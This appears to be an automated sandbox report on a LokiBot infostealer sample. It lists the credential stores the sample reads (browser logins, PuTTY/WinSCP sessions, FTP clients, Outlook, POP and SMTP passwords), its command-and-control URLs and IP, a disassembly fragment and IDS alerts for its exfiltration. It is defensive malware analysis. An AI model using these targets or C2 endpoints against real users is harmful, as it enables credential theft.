Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\0yWVteGq5T.exe TID: 5580

Thread sleep time: -480000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Code function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

0_2_00403D74

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: 0yWVteGq5T.exe, 00000000.00000002.3354762092.000000000059E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Code function: 0_2_0040317B mov eax, dword ptr fs:[00000030h]

0_2_0040317B

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Code function: 0_2_00402B7C GetProcessHeap,RtlAllocateHeap,

0_2_00402B7C

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Code function: 0_2_00406069 GetUserNameW,

0_2_00406069

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.3354762092.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0yWVteGq5T.exe PID: 3416, type: MEMORYSTR
Source: Yara match	File source: 0yWVteGq5T.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\0yWVteGq5T.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\0yWVteGq5T.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Code function: PopPassword		0_2_0040D069
Source: C:\Users\user\Desktop\0yWVteGq5T.exe	Code function: SmtpPassword		0_2_0040D069

Source: Yara match	File source: 0yWVteGq5T.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.3354762092.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0yWVteGq5T.exe PID: 3416, type: MEMORYSTR
Source: Yara match	File source: 0yWVteGq5T.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.0yWVteGq5T.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2104724175.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	2 Credentials in Registry	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	3 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0yWVteGq5T.exe	97%	ReversingLabs	Win32.Infostealer.LokiBot
0yWVteGq5T.exe	88%	Virustotal		Browse
0yWVteGq5T.exe	100%	Avira	TR/Crypt.XPACK.Gen
0yWVteGq5T.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
	0%	Avira URL Cloud	safe
http://kbfvzoboss.bid/alien/fre.php	100%	Avira URL Cloud	phishing
http://alphastand.win/alien/fre.php	100%	Avira URL Cloud	malware
http://alphastand.trade/alien/fre.php	100%	Avira URL Cloud	malware
http://alphastand.top/alien/fre.php	100%	Avira URL Cloud	phishing
http://94.156.177.41/simple/five/fre.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
	true	Avira URL Cloud: safe	unknown
http://kbfvzoboss.bid/alien/fre.php	true	Avira URL Cloud: phishing	unknown
http://alphastand.win/alien/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.trade/alien/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.top/alien/fre.php	true	Avira URL Cloud: phishing	unknown
http://94.156.177.41/simple/five/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	0yWVteGq5T.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1571285
Start date and time:	2024-12-09 08:50:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0yWVteGq5T.exe renamed because original name is a hash value
Original Sample Name:	c046027428e0fb93ae035e318138a2f8d6b5830bc81d825e2f0e8d72e827660c.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/2@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:51:44	API Interceptor	55x Sleep call for process: 0yWVteGq5T.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	CLOSURE DATE FOR THE YEAR.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/kings/five/fre.php
	Order84746.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/davinci/five/fre.php
	FVR-N2411-07396.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/soja/five/fre.php
	Scan copy.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/simple/five/fre.php
	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php
	stthigns.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	goodtoseeuthatgreatthingswithentirethingsgreatfor.hta	Get hash	malicious	Cobalt Strike, Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	PO-000041492.docx.doc	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	ECxDwGGFH3.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	boatnet.m68k.elf	Get hash	malicious	Mirai	Browse	93.123.85.192
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	93.123.85.192
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	93.123.85.192
	boatnet.mips.elf	Get hash	malicious	Mirai	Browse	93.123.85.192
	boatnet.ppc.elf	Get hash	malicious	Mirai	Browse	93.123.85.192
	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse	93.123.85.192
	boatnet.m68k.elf	Get hash	malicious	Mirai	Browse	93.123.85.24
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	93.123.85.24
	boatnet.sh4.elf	Get hash	malicious	Mirai	Browse	93.123.85.24
	boatnet.mips.elf	Get hash	malicious	Mirai	Browse	93.123.85.24

Process:	C:\Users\user\Desktop\0yWVteGq5T.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\0yWVteGq5T.exe
File Type:	data
Category:	dropped
Size (bytes):	49
Entropy (8bit):	1.2701062923235522
Encrypted:	false
SSDEEP:	3:/l1PL3n:fPL3
MD5:	CD8FA61AD2906643348EEF98A988B873
SHA1:	0B10E2F323B5C73F3A6EA348633B62AE522DDF39
SHA-256:	49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
SHA-512:	1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.340058047768735
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0yWVteGq5T.exe
File size:	98'816 bytes
MD5:	d7ede461fd6438cfae2cba59fa1e07e9
SHA1:	b6f2dbb0d2ae969583a96b8463ccc561324c7b27
SHA256:	c046027428e0fb93ae035e318138a2f8d6b5830bc81d825e2f0e8d72e827660c
SHA512:	3dd06de3fbd5f2e76ec458b4cb3045f265888b8fcfb99451ad6ec960dc1e592b79393f580dbc2ca4e0cda3d867925949b63815cb9553e143a45d5d28c024a431
SSDEEP:	1536:6zvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqnIzmd:hSHIG6mQwGmfOQd8YhY0/EKUG
TLSH:	64A32942B2A5C030F7B74DB2BB73A5B7857E7C332D22C84E9352459A14215E1EB7AB13
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4139de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0239fd611af3d0e9b0c46c5837c80e09

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ecx
and dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-04h]
push esi
push edi
push eax
call 00007F1614B67599h
push eax
call 00007F1614B67576h
xor esi, esi
mov edi, eax
pop ecx
pop ecx
cmp dword ptr [ebp-04h], esi
jle 00007F1614B67756h
push 004188BCh
push dword ptr [edi+esi*4]
call 00007F1614B59C25h
pop ecx
pop ecx
test eax, eax
je 00007F1614B6773Dh
push 00002710h
call 00007F1614B5A4DAh
pop ecx
inc esi
cmp esi, dword ptr [ebp-04h]
jl 00007F1614B6770Eh
push 00000000h
call 00007F1614B6756Eh
push 00000000h
call 00007F1614B67882h
pop ecx
pop edi
xor eax, eax
pop esi
mov esp, ebp
pop ebp
retn 0010h
push ebp
mov ebp, esp
xor eax, eax
push eax
push eax
push E567384Dh
push eax
call 00007F1614B56EC9h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
push ebp
mov ebp, esp
push esi
mov esi, dword ptr [ebp+08h]
test esi, esi
je 00007F1614B67794h
push esi
call 00007F1614B599F0h
pop ecx
test eax, eax
je 00007F1614B67789h
push esi
call 00007F1614B57A2Ch
pop ecx
test eax, eax
je 00007F1614B6777Eh
mov eax, dword ptr [0049FDECh]
cmp dword ptr [ebp+10h], 00000000h
cmovne eax, dword ptr [ebp+10h]
push eax
push dword ptr [0049FDE8h]
call 00007F1614B59424h
push dword ptr [ebp+0Ch]
push dword ptr [0049FDE8h]
call 00007F1614B59416h
push 00000000h
push 00000000h
push esi

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[ASM] VS2003 (.NET) build 3077
[ASM] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2013 UPD5 build 40629
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18ed0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14000	0x13800	94fa411af1cc6bb168a3ea0e66e80f78	False	0.5685096153846154	data	6.49204829439013	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x5000	0x4200	6ada3db9ddb6e4994558f8fd80a5cd3f	False	0.3701467803030303	data	4.2685971103623865	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x1a000	0x86000	0x200	955b3a57edf41d6c47c7225e8d847f91	False	0.056640625	OpenPGP Public Key	0.32171607431271465	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.x	0xa0000	0x2000	0x200	b9e3e5990c2d44bf83df2063f8e8e2cb	False	0.21875	data	1.957748567000045	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
WS2_32.dll	getaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
KERNEL32.dll	GetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
ole32.dll	CoCreateInstance, CoInitialize, CoUninitialize
OLEAUT32.dll	VariantInit, SysFreeString, SysAllocString

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-09T08:51:32.799150+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	50032	94.156.177.41	80	TCP
2024-12-09T08:51:32.799150+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	50032	94.156.177.41	80	TCP
2024-12-09T08:51:39.566096+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49707	94.156.177.41	80	TCP
2024-12-09T08:51:39.566096+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49707	94.156.177.41	80	TCP
2024-12-09T08:51:39.566096+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49707	94.156.177.41	80	TCP
2024-12-09T08:51:40.997887+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.6	49707	94.156.177.41	80	TCP
2024-12-09T08:51:41.388226+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49708	94.156.177.41	80	TCP
2024-12-09T08:51:41.388226+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49708	94.156.177.41	80	TCP
2024-12-09T08:51:41.388226+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49708	94.156.177.41	80	TCP
2024-12-09T08:51:43.112123+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.6	49708	94.156.177.41	80	TCP
2024-12-09T08:51:43.494161+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49710	94.156.177.41	80	TCP
2024-12-09T08:51:43.494161+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49710	94.156.177.41	80	TCP
2024-12-09T08:51:43.494161+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49710	94.156.177.41	80	TCP
2024-12-09T08:51:44.928264+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49710	94.156.177.41	80	TCP
2024-12-09T08:51:44.928264+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49710	94.156.177.41	80	TCP
2024-12-09T08:51:45.047544+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.6	49710	TCP
2024-12-09T08:51:45.316994+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.6	49712	94.156.177.41	80	TCP
2024-12-09T08:51:45.316994+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.6	49712	94.156.177.41	80	TCP
2024-12-09T08:51:45.316994+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.6	49712	94.156.177.41	80	TCP
2024-12-09T08:51:46.616642+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.6	49712	94.156.177.41	80	TCP
2024-12-09T08:51:46.616642+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.6	49712	94.156.177.41	80	TCP
